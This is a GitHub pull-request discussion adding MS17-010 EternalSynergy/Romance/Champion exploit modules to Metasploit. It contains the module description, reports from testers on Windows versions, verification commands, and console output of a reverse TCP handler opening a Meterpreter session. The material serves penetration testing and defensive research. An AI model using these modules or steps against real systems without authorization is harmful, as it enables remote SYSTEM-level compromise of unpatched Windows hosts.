MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules #9473
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
added 6 commits
January 27, 2018 20:49
|
YUS! |
added 2 commits
January 28, 2018 22:32
|
Hello again. :-) |
timwr
reviewed
Jan 29, 2018
| @ctx['os'] = 'WIN7' | ||
| @ctx['go_fish'] = true | ||
| elsif os.starts_with? "Windows Server 2003 " | ||
| @ctx['os'] = 'WIN2K3' |
ghost
changed the title
|
Success on Windows XP SP3 (x86) with Automatic targeting (unauthenticated). |
|
Success on Windows Vista Home Premium (x86) with Automatic targeting (unauthenticated). |
|
Fail on Windows Server 2003 SP2 with Automatic targeting (unauthenticated). |
|
Fail on Windows XP Professional SP0 (x86) with Automatic targeting (unauthenticated). |
|
Damn, thanks a bunch. I soon as I deployed this on my early morning pentest I owned AD in seconds 🥇 |
|
Success on Windows 2000 Professional SP4 (x86) with Automatic targeting (unauthenticated). |
|
How WE Can merge your branch to help you testing? Sry new to github |
|
@bwatters-r7 very interested in all service packs of Server 2003 actually. Could have similar issues as XP did. @iNoSec something like (untested) |
|
FYI, tests still running, but Win2003x86_SP0 succeeded. Win2003x64_SP1 failed; debug output: Other tests still running. |
|
Woops. Wrong key when adding x64 to dynamite list, try Win2003x64_SP1 again please. |
added 2 commits
January 31, 2018 17:17
|
Roger. The tests are scripted, but it will grab the most up-to-date version of the code for the PR, so your new push would have been used on the next OS. Here are the results so far: |
|
@bwatters-r7 you can Say me how you do to add it to the framework please ? |
|
@iNoSec something like (untested) Or alternatively: |
|
After checking the Win2008x86_SP1 VM, I noticed I forgot to disable Windows Firewall when I set it up originally. Disabled it, reset and re-ran all tests last night: Win2003x86_SP0 |
|
So we have just 3 more OSes to test to land this? |
|
Success on Windows 10 Enterprise 10240 x64 authenticated/native target |
|
Success on Windows 10 Enterprise 10240 x86 authenticated/native target |
|
I've confirmed Windows Vista x64 is working. msf exploit(windows/smb/ms17_010_psexec) > exploit [] Started reverse TCP handler on 192.168.206.128:4444 meterpreter > getuid |
|
Thanks for all the testing, folks! I think we can leave the remaining to-dos for the next PR. Let us know when you're ready to ship this, @zerosum0x0. 👍 |
|
@wvu-r7 Seems good to me |
wvu
added a commit
to wvu/metasploit-framework
that referenced
this pull request
Feb 2, 2018
Release NotesAuxiliary and exploit modules for EternalSynergy, EternalRomance, and EternalChampion have been added to the framework. The exploits/windows/smb/ms17_010_psexec module exploits SMB with vulnerabilities in MS17-010 to give you the ability to run any command as SYSTEM or stage Meterpreter. This exploit is more reliable than the EternalBlue exploit, but requires a named pipe. |
ghost
deleted the
jmartin-tech
pushed a commit
to jmartin-tech/metasploit-framework
that referenced
this pull request
Feb 2, 2018
|
As a general public service announcement: If you would like to use this module, you need to use a version of Metasploit that already has it packaged, or wait until your Linux distribution is shipping it. Just copying the module file will not work on an older version of Metasploit Framework. This is also a closed PR. If you have bugs, file them as new tickets. If you have general questions or need help, ask on IRC, slack, or in a help forum. You can find information on these channels at https://metasploit.com. Thanks! |
|
@zerosum0x0 @bcoles @wvu-r7 @ronnieflip @mkienow-r7 |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
MS17-010 Windows SMB Remote Command and Code Execution modules for all vulnerable targets Windows 2000 through 2016 (and of course the standard home/workstation counterparts).
Screenshots: https://twitter.com/zerosum0x0/status/957839430777057280
You can run any command as SYSTEM, or stage Meterpreter. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
The exploit chain is an almost 1:1 skid port of @worawit awesome zzz_exploit adaptation, which brings a few improvements over the original Eternal exploits. Instead of going for shellcode execution, it overwrites the SMB connection session structures to gain Admin/SYSTEM session. The MSF module is leaner (stripped down packet count/padding), checks extra named pipes, sprinkles randomness where possible, and has Metasploit's psexec DCERPC implementation bolted onto it. For the last reason, Rex is used and not RubySMB.
Changes to MSF Lib
The exploit needs a smaller SMB Max Buffer Size than the hard-coded values in the Rex SMB proto client libraries. I exposed this as a public member that defaults to the old value. Existing code should not be broken.
Most of the exploit code is in a new mix-in (to be shared for the aux and exploit).
Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Authors and project maintainers are not responsible or liable for misuse of the software. Use responsibly.
AV/Firewall Warning
Unlike EternalBlue, the exploit module will drop to disk (or use a PowerShell command).
Standard rules apply when it comes to AV/firewall for the exploit module. The command module should work fine though, try some of the following:
Test Progress
Should work on all unpatched versions of Windows 2000+ x86/x64.
Asking for help in testing thoroughly. Provide crash dumps and pcaps in case of failure. Exploit should virtually never crash post-Vista, and only in extremely rare circumstances for earlier versions.
set VERBOSE 1set DBGTRACE 1Todo
Not necessarily for this PR, but some ideas for improvements.
Verification
List the steps needed to make sure this thing works
msfconsoleuse exploit/windows/smb/ms17_010_psexecuse auxiliary/admin/smb/ms17_010_commandset VERBOSE 1set DBGTRACE 1